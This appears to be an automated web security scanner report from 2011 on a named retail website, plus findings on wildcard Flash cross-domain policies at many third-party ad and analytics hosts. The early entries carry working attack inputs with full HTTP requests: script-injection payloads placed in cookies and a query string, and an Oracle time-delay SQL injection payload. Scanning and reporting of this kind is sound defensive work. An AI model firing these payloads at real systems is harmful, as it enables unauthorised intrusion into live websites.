The value of the mmlID cookie is copied into an HTML comment. The payload c290d--><script>alert(1)</script>9551fb33735 was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168c290d--><script>alert(1)</script>9551fb33735; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:16:36 GMT Server: Apache ETag: "AAAAS7ub8EQ" Last-Modified: Fri, 25 Mar 2011 19:13:44 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 37868
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the order cookie is copied into an HTML comment. The payload 2d0a4--><script>alert(1)</script>bcb7d662e45 was submitted in the order cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=635039142d0a4--><script>alert(1)</script>bcb7d662e45; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:17:02 GMT Server: Apache ETag: "AAAAS7ucCQU" Last-Modified: Fri, 25 Mar 2011 19:14:10 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 38491
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the s_cc cookie is copied into an HTML comment. The payload 15573--><script>alert(1)</script>baa59d3f676 was submitted in the s_cc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true15573--><script>alert(1)</script>baa59d3f676; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:29:22 GMT Server: Apache ETag: "AAAAS7uc0rL" Last-Modified: Fri, 25 Mar 2011 19:17:36 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 39295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the s_sq cookie is copied into an HTML comment. The payload a3d4d--><script>alert(1)</script>26f91f30e7b was submitted in the s_sq cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1 Host: www.territoryahead.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5Da3d4d--><script>alert(1)</script>26f91f30e7b; 90232094_clogin=l=1301080516&v=3&e=1301082325244
Response
HTTP/1.1 500 Internal Server Error Date: Fri, 25 Mar 2011 19:20:34 GMT Server: Apache ETag: "AAAAS7uc2DA" Last-Modified: Fri, 25 Mar 2011 19:17:42 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 39295
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: aka-cdn-ns.adtechus.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 12 May 2010 09:39:46 GMT Accept-Ranges: bytes Content-Length: 111 Content-Type: text/xml Cache-Control: max-age=141515 Expires: Mon, 28 Mar 2011 11:54:31 GMT Date: Sat, 26 Mar 2011 20:35:56 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.search.live.net
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 266 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 68D294F3971D1719A2D5F7CCEEAC18F80000010A P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Sat, 26 Mar 2011 20:36:07 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-03-26T20%3a36%3a07; expires=Tue, 05-Apr-2011 20:36:07 GMT; domain=.live.net; path=/ Set-Cookie: _SS=SID=2DB9D01009D44A2088F8BF513528D138; domain=.live.net; path=/ Set-Cookie: SRCHUID=V=2&GUID=F87E1B9F1DEB4B42A164763906F31065; expires=Mon, 25-Mar-2013 20:36:07 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110326; expires=Mon, 25-Mar-2013 20:36:07 GMT; domain=.live.net; path=/
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: at.atwola.com
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com
Response
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Sat, 26 Mar 2011 19:13:28 GMT Date: Fri, 25 Mar 2011 19:13:28 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: dominionenterprises.112.2o7.net
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:13:29 GMT Server: Omniture DC/2.0.0 xserver: www93 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: imagec17.247realmedia.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Fri, 30 Oct 2009 20:24:23 GMT ETag: "100e7-d0-4772cd0408bc0" Accept-Ranges: bytes Content-Length: 208 Content-Type: text/xml Date: Fri, 25 Mar 2011 19:13:23 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: learn.shavlik.com
Response
HTTP/1.1 200 OK Content-Length: 145 Content-Type: text/xml Content-Location: http://learn.shavlik.com/crossdomain.xml Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT Accept-Ranges: bytes ETag: "4e3f9ebe2a24ca1:1772" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Fri, 25 Mar 2011 20:41:54 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: log30.doubleverify.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT Accept-Ranges: bytes ETag: "034d21c5697ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 26 Mar 2011 20:36:37 GMT Connection: close Content-Length: 378
...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: o.sa.aol.com
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:35:54 GMT Server: Omniture DC/2.0.0 xserver: www18 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oasc05139.247realmedia.com
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:13:23 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Fri, 10 Jul 2009 20:04:47 GMT ETag: "11e009-d0-46e5f7bee35c0" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com
Response
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Sun, 27 Mar 2011 20:36:18 GMT Content-Type: text/xml Content-Length: 207 Date: Sat, 26 Mar 2011 20:36:18 GMT Server: QS
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Fri, 25 Mar 2011 11:46:38 GMT Expires: Thu, 24 Mar 2011 11:46:37 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 26799 Cache-Control: public, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide.com
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:18 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sat, 02 Apr 2011 20:36:18 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia.com
Response
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 26 Mar 2011 20:36:22 GMT Content-Type: text/plain Content-Length: 81
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: wsjrs2.s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/490793/1-wsj_110047_liberal_300x250_concept2_v7.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.econda-monitor.de
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"214-1265030770000" Last-Modified: Mon, 01 Feb 2010 13:26:10 GMT Content-Type: application/xml Content-Length: 214 Date: Fri, 25 Mar 2011 20:43:40 GMT Connection: keep-alive
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.huffingtonpost.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.8 (Unix) Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT ETag: "26e2850-fd-48a53d22e2200" Content-Type: application/xml Date: Sat, 26 Mar 2011 20:36:01 GMT Content-Length: 253 Connection: close
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ads.tw.adsonar.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.tweetmeme.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sat, 26 Mar 2011 16:58:17 GMT Content-Type: text/xml; charset='utf-8' Connection: close P3P: CP="CAO PSA" Expires: Sat, 26 Mar 2011 16:58:53 +0000 GMT Etag: fe9f3be2d9532deeab27f58209bf7be5 X-Served-By: h03
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Fri, 25 Mar 2011 11:46:53 GMT Expires: Sat, 26 Mar 2011 11:46:53 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 26498 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: js.adsonar.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT ETag: "a3d-466fac2afc940"-gzip Content-Type: application/xml Cache-Control: max-age=1800 Expires: Sat, 26 Mar 2011 21:06:16 GMT Date: Sat, 26 Mar 2011 20:36:16 GMT Content-Length: 2621 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: my.screenname.aol.com
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:19 GMT Server: Apache Last-Modified: Thu, 17 Mar 2011 23:57:10 GMT ETag: "3f1-49eb66b672180" Accept-Ranges: bytes Content-Length: 1009 P3P: CP="PHY ONL PRE STA CURi OUR IND" Keep-Alive: timeout=15, max=440 Connection: Keep-Alive Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: o.aolcdn.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "86252e13a238a19354a0bc819378c538:1294158341" Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT Content-Type: application/xml Cache-Control: max-age=683105 Expires: Sun, 03 Apr 2011 18:21:22 GMT Date: Sat, 26 Mar 2011 20:36:17 GMT Content-Length: 3059 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
Response
HTTP/1.0 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Fri, 25 Mar 2011 11:49:02 GMT Expires: Sat, 26 Mar 2011 11:49:02 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 26769 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Powered-By: HPHP X-FB-Server: 10.30.145.195 X-Cnection: close Date: Sat, 26 Mar 2011 20:36:08 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.